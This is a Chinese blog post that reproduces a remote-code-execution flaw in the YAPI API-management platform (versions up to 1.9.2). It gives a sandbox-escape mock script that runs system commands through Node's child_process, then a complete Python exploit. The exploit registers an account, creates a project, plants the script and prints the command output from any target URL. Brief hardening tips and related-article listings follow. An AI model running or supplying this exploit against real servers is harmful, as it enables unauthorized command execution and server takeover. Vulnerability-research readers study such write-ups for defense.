YAPI接口管理平台RCE复现-附exp

最新推荐文章于 2024-06-07 17:11:21 发布
最新推荐文章于 2024-06-07 17:11:21 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: 漏洞专栏 POC-EXP及其他脚本代码 文章标签: 安全漏洞 可视化 接口
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Trouble_99/article/details/118667625
版权

目录

漏洞简介

YAPI是由去哪儿网移动架构组开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。
漏洞存在于YAPI的mock脚本服务上,是由于mock脚本自定义服务未对JS脚本的命令过滤,用户可以添加任何请求处理脚本,攻击者可利用该漏洞在受影响的服务器上执行任意JS代码。

影响版本

YAPI <= 1.9.2

漏洞复现

手工验证

1、注册账号
在这里插入图片描述
在这里插入图片描述

2、登录后新建项目
在这里插入图片描述在这里插入图片描述

3、设置全局mock脚本及接口
在这里插入图片描述
JS代码如下:

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ls").toString()

4、添加接口
在这里插入图片描述在这里插入图片描述

5、访问mock接口地址,命令执行成功
在这里插入图片描述

EXP验证

python yapi.py -u x.x.x.x -e whoami

在这里插入图片描述代码如下:

# -*- coding: utf-8 -*-

import json

import requests
import argparse

group_id = ''
project_id = ''
catid = ''
flag=1


def reg(gurl):
    global flag
    url = gurl + "/api/user/reg"
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    data = '{"email":"zxcc@zxcc.com","password":"zxcczxcc","username":"zxcc"}'
    rego = requests.post(url=url, headers=header, data=data)
    # print(rego.text)
    if str(400) in rego.text:
        flag = 0


session = requests.Session()


def login(gurl):
    url = gurl + "/api/user/login"
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    data = '{"email":"zxcc@zxcc.com","password":"zxcczxcc"}'
    logingo = session.post(url=url, headers=header, data=data)
    # print(logingo.text)
    # print(session.__dict__)


def add(gurl):
    global group_id, project_id, catid
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    turl = gurl + "/api/group/get_mygroup"
    t1 = session.get(url=turl)
    group_id = json.loads(t1.text)['data']['_id']
    url1 = gurl + "/api/project/add"
    data1 = '{"name":"1","basepath":"/1","group_id":"' + str(
        group_id) + '","icon":"code-o","color":"green","project_type":"private"}'
    add1 = session.post(url=url1, headers=header, data=data1)
    turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"
    t2 = session.get(url=turl2)
    project_id = json.loads(t2.text)['data']['list'][0]['_id']
    turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""
    t3 = session.get(url=turl3)
    catid = json.loads(t3.text)['data'][0]['_id']
    url2 = gurl + "/api/interface/add"
    data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'
    # print(data1)

    add2 = session.post(url=url2, headers=header, data=data2)
    # print(add1.text)
    # print(add2.text)


def run(gurl, exec):
    turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""
    t1 = session.get(url=turl)
    interface_id = json.loads(t1.text)['data']['list'][0]['_id']
    url = gurl + "/api/plugin/advmock/save"
    data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(
        interface_id) + '''","mock_script":"const sandbox = this\\nconst ObjectConstructor = this.constructor\\nconst FunctionConstructor = ObjectConstructor.constructor\\nconst myfun = FunctionConstructor('return process')\\nconst process = myfun()\\nmockJson = process.mainModule.require(\\"child_process\\").execSync(\\"''' + exec + '''\\").toString()","enable":true}'''
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }

    cmd = session.post(url=url, data=data, headers=header)
    # print(cmd.text)
    result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1")
    print(result.text)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Yapi RCE , need register mode open")
    parser.add_argument('-u', '--url')
    parser.add_argument('-e', '--exec', default='whoami & ifconfig || ipconfig')
    args = parser.parse_args()
    gurl = str(args.url).rstrip('/')
    exec = args.exec
    if args.url :
        # print(gurl)
        reg(gurl)
        if flag:
            login(gurl)
            add(gurl)
            run(gurl, exec)
        else:
            print('Not support register !')
    else:
        print('Need The Target,please add -h / --help')
    # print(group_id, project_id, catid, '123')

漏洞防御

1、更改Yapi运行端口

2、使用Nginx对Yapi进行反向代理

3、安全组只开放Nginx端口,你可以在Nginx限制IP白名单。

4、关闭Yapi注册

5、关闭Yapi Mock

参考文章:
感谢Azeng师傅提供的EXP
参考微信公众号:星期五实验室

pikeboom
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
YApi Mongo注入导致RCE漏洞复现
fly夏天的博客
01-31 689
文章复现了yapi mongo注入导致rce漏洞,并提供了可运行的复现代码。
docker-YApi接口管理平台YApi的Docker架构
02-02
接下来,修改docker docker-compose.yml中yapi-web下的环境变量YAPI_ADMIN_ACCOUNT为你的管理员邮箱, YAPI_ADMIN_PASSWORD为你的管理员密码。最后,执行docker-compose up -d启动服务。然后,通过...
Yapi接口管理平台RCE漏洞
m0_65150886的博客
01-31 405
的、可视化接口管理平台。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3、安全组只开放Nginx端口,你可以在Nginx限制IP白名单。5.点击高级Mock,选择脚本,添加代码,选择开启,并进行保存。1.访问http://ip:port,出现如下页面,开始实验。2、使用Nginx对Yapi进行反向代理。YApi是一个可本地部署的、打通前后端及。5、关闭Yapi Mock。1、更改Yapi运行端口。密码:ymfe.org。4、关闭Yapi注册。
Yapi RCE 复现和批量编写
最新发布
YJ_12340的博客
06-07 393
通过 pip install fofa 下载,但是在 python3 中并不能正常运行,所以我修改了一下脚本,改名为 fofa.py 放在脚本的执行目录。可以看到命令成功执行了,而且这很大概率不是docker,然后这里有第四道坎,命令可能根本执行不成功,比如。跑起来就是这种效果,但是我的那套命令不是很好,通常是解析出错,可以的话,师傅们能给点指导意见嘛。这是第一道坎,不,第一道坎应该是压根就访问不了,这是第二道坎。中的exp,保存到脚本中,但是这里可能保存不成功,第三道坎。,但是为了避开国内,所以使用。
YAPI接口管理平台RCE漏洞排查
dayouzi的博客
08-14 633
Yapi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口管理。攻击者通过注册用户,并使用 Mock 功能实现远程命令执行。命令执行的原理是 Node.js 通过 require(‘vm’) 来构建沙箱环境,而攻击者可以通过原型链改变沙箱环境运行的上下文,从而达到沙箱逃逸的效果。
Yapi Mock RCE 漏洞复现分析
灰蜗牛
07-12 2372
Yapi Mock RCE 漏洞复现分析 文章目录Yapi Mock RCE 漏洞复现分析0x01 基本信息0x02 漏洞复现0x03 漏洞分析0x04 威胁排查0x05 缓解措施 0x01 基本信息 漏洞名称 : YAPI远程代码执行漏洞 组件名称 : YAPI 影响范围 : YAPI <= 1.9.2, 漏洞类型 :远程代码执行 利用条件 : ​ 1、用户认证:需要用户认证 ​ 2、触发方式:远程 综合评价 : <综合评定利用难度>:中等,需要用户认证。 <综合评定威胁等级&gt
Yapi-plugin-export-docx-data-master.zip
02-07
YAPI导出word文件插件,自定义模板,方便有效; 载入模式: 1. yapi plugin --name yapi-plugin-export-docx-data 2. 放入ext中,作为内置插件
java8源码-yapi-cooler:yapi接口管理平台定时任务备份工具
06-04
yapi接口管理平台定时任务备份工具。使用http请求的形式,对内网部署的yapi平台进行定时任务备份。 使用方法(依赖java8环境) 一、通过jar包运行 1.1 点击,下载最新的jar包到本地 1.2 进入jar包修改 src/main/...
YApi 跨域请求插件 cross-request 3.0.0
04-07
前端和后端都可以需要,给yapi测试集合的时候使用
YApi 是高效、易用、功能强大的 api 可视化接口管理平台
05-02
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的...
【漏洞复现】YApi接口管理平台远程代码执行漏洞(含批量POC)
Adminxe的博客
07-11 939
0x00简介 YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立..
yapi RCE漏洞复现
尐猴子君ii的博客
08-23 1771
前段时间,公司打内部的攻防比赛,然后手里的工作比较忙,时间也比较短,于是就没怎么打。发现了一台主机3000端口开了yapi服务,且能在前台执行命令,但是就是弹不回来shell。有门进不去的感觉就很烦,心痒痒的就想在赛后复盘一下。于是就有这篇文章。 贵有恒,何必三更起五更睡;最无益,只怕一日曝十寒。话不多说,搞快点。 首先面向fofa搜索yapi的资产 找到了个54.xxx的IP,就你了皮卡丘 首先进去,发现注册账户功能是开放的,冲 登录 创建项目 添加接口 执行payload con
YApi分析从NoSQL注入到RCE远程命令执行.md
god_Zeo的安全博客
03-05 2284
YApi是一个可本地部署的、打通前后端及QA的、可视化接口管理平台。YApi 是高效易用功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口管理。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。
【漏洞复现】Yapi接口管理平台RCE漏洞汇总
做自己喜欢的事,并将其发挥到极致!
01-10 5969
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口管理
YApi接口管理平台远程代码执行漏洞复现
qq_44484541的博客
11-01 354
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
漏洞复现-yapi远程执行命令漏洞复现
关注网络安全、云原生安全
07-22 658
YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。这里使用的JayFong的docker-YApi,WEB UI在40001端口。启动后发现管理员账号密码不对,应该是环境变量在容器中没有使用,查看配置文件找到管理员账号。网站开放注册功能时可随意注册,设置全局mock脚本可执行任意代码。通过官方文档学习如何新建接口。查看安装脚本,找到密码。
YAPI安装二次开发
quzhem的专栏
08-13 1048
高级mock接口支持open token方式请求 位置:/vendors/server/controllers/base.js,方法async init ,54行 变量openApiRouter新增:'/api/plugin/advmock/save' 此时就可以通过设置token的方式调用更改高级Mock中的脚本了,也就是/api/plugin/advmock/save let openApiRouter = [ '/api/open/run_auto_test', '
漏洞复现之YApi接口管理平台远程代码执行
白帽子九一
05-31 1092
1. 简介 YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
php接口api统一,API统一管理平台-YApi
05-25
YApi是一个开源的、可视化的、接口管理平台,支持前后端分离,用于接口管理、文档编写、测试环境管理和Mock服务器等功能,方便团队协作和接口测试。它支持多种语言的接口,包括PHP、Java、Node.js等,可以进行接口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值